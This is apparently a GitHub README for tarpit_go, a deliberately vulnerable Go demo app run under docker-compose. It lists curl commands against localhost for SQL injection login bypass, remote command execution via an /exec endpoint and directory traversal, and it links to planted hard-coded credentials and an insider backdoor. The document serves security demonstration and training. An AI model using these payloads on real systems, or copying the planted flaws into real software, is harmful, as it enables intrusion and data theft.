Giters

Preetam / tarpit_go

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Demo steps

  1. Start containers:
cd <tarpit_go>
docker-compose up
  1. Visit http://localhost:3000/login to see the demo; (There are also curl commands version attached)
  2. Tear down the environment:
control + C
docker-compose down

curl version

  1. Sql injection demo: //password='12346" OR ""="'
curl -X POST -d "username=admin&password=12346%22+OR+%22%22%3D+%22" http://localhost:3000/login
  1. Remote code execution:
curl -X POST -d "cmd=ls -a" http://localhost:3000/exec
  1. Directory traversal demo: (login first)
curl -X GET http://localhost:3000/image/../demo/demo.go
  1. Hard Coded credentials:

https://github.com/AiolosLiu/tarpit_go/blob/master/auth.go#L19

  1. Sensitive data leak:

https://github.com/AiolosLiu/tarpit_go/blob/master/auth.go#L26

  1. Insider attack:

https://github.com/AiolosLiu/tarpit_go/blob/master/vulns.go#L73

  1. Business logic flaw:

https://github.com/AiolosLiu/tarpit_go/blob/master/workflow.go#L100

About

Languages

Language:Go 67.6%Language:Shell 15.9%Language:HTML 15.4%Language:Dockerfile 1.1%